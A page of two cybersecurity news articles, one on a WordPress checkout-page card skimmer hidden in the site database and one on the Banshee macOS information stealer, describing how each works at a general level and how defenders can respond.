Researchers Warn Of Stealthy Malware Stealing Payment Information From WordPress Sites - 1

Image by Luca Bravo, from Unsplash

Researchers Warn Of Stealthy Malware Stealing Payment Information From WordPress Sites

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Justyn Newman Former Lead Cybersecurity Editor

Cybersecurity researchers at Sucuri are alerting website owners about a new type of cyberattack targeting WordPress e-commerce sites.

In a Rush? Here are the Quick Facts!

  • Malware injects malicious JavaScript into WordPress database to steal payment details during checkout.
  • It activates on checkout pages and captures data like credit card numbers and CVV codes.
  • Stolen data is encrypted and sent to remote servers controlled by attackers.

This attack, known as a credit card skimmer campaign, is designed to secretly steal payment information from customers. The malware operates in the background, injecting malicious code into a WordPress website’s database and compromising checkout pages where customers enter their payment details.

The malware is particularly sneaky because it doesn’t rely on infecting theme files or plugins, which are typically scanned for malicious code. Instead, it hides inside the database, making it harder to detect.

Specifically, the malicious code is embedded in the “wp_options” table, a critical part of the WordPress setup, as noted by Sucuri. This allows it to avoid detection by common security tools and remain on infected sites undisturbed.

Once the malware is activated, it targets the checkout page, where users enter their credit card numbers, expiration dates, and CVV codes. The malicious code looks for the word “checkout” in the web address to ensure it only runs on the payment page, preventing it from being triggered on other parts of the site.

It either adds a fake payment form or hijacks the existing one, making it appear as if users are entering their details on a legitimate payment processor’s form, such as Stripe.

As customers input their credit card information, the malware captures it in real time. To make the stolen data harder to detect, the malware scrambles the information using encoding and encryption techniques, then sends it to remote servers controlled by the attacker.

This process is done quietly, so customers won’t notice anything unusual while completing their purchases.The stolen data is then sold on underground markets or used for fraudulent transactions, putting both customers and businesses at risk.

What makes this attack particularly dangerous is that it operates without disrupting the checkout process, so users are unaware their data is being stolen.

The researchers say that website owners can protect themselves by regularly checking for suspicious code in the WordPress admin panel, specifically under the “Widgets” section. They should look for unfamiliar JavaScript code that could indicate the presence of malware.

Banshee Malware Targets MacOS Users With New Stealth Features - 2

Image by Ramshid, from Unsplash

Banshee Malware Targets MacOS Users With New Stealth Features

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Justyn Newman Former Lead Cybersecurity Editor

Check Point Research (CPR) has been tracking a dangerous version of Banshee, a malware targeting macOS users since September 2024.

In a Rush? Here are the Quick Facts!

  • Banshee Stealer targets macOS, stealing browser credentials and cryptocurrency wallet data.
  • The malware evades detection using Apple’s XProtect encryption in its latest version.
  • Banshee spreads via phishing websites and fake GitHub repositories impersonating popular software.

Banshee is capable of stealing sensitive information such as browser credentials, cryptocurrency wallet data, and passwords, as reported in the new analysis by CPR .

According to the researchers, the malware has managed to remain undetected for over two months, thanks to a modification of Apple’s XPng’s encryption, which prevents antivirus systems from identifying it.

Banshee is typically distributed through phishing websites and fake GitHub repositories, often posing as popular software like Chrome, Telegram, or TradingView. Once installed, Banshee silently runs in the background, stealing data from browsers like Chrome, Brave, and Edge.

It also targets cryptocurrency wallet extensions and Two-Factor Authentication (2FA) credentials, sending the stolen information to remote servers, as reported by CPR.

The researchers say that a significant change in the latest version of Banshee is the removal of a feature that previously halted its operations if the Russian language was detected. This update broadens the malware’s potential victim pool, indicating an expansion of its global reach.

Despite the leak of Banshee’s source code in November 2024, which helped antivirus systems detect the malware more effectively, phishing campaigns continue to distribute it. This leak also raises concerns that other cybercriminals may develop new variants of Banshee, says CPR.

With macOS devices now used by over 100 million people worldwide, the Banshee Stealer campaign emphasizes the increasing risks to macOS users. “This new Banshee Stealer variant exposes a critical gap in Mac security,” said Ms. Ngoc Bui, a cybersecurity expert at Menlo Security, as reported by Forbes .

“While companies are increasingly adopting Apple ecosystems, the security tools haven’t kept pace. We need a multi-layered approach to security, including more trained hunters on Mac environments,” he added.

Privileged access management, once considered a nice-to-have feature, has now become a cornerstone of modern cybersecurity for business users. The Banshee Stealer threat underscores the urgency of this shift.

“By restricting access and ensuring that elevated permissions are granted only when necessary,” Scobey explained, “privileged access management significantly reduces the attack surface for threats like Banshee,” as reported by Forbes

When combined with endpoint protection and robust password management, privileged access management offers a powerful defense against such exploits.

“The time has come for businesses to shift from reactive to proactive security strategies,” Scobey emphasized, Forbes. He concluded, “Malware like Banshee thrives on gaps in vigilance and access controls. By prioritizing advanced tools, user education, and layered defenses, organizations can stay ahead in the race against evolving cyber threats.”

The malware’s sophistication proves that even operating systems traditionally seen as secure, like macOS, are vulnerable to targeted cyberattacks. Both businesses and individuals must be vigilant and adopt advanced cybersecurity measures to protect against evolving threats like Banshee.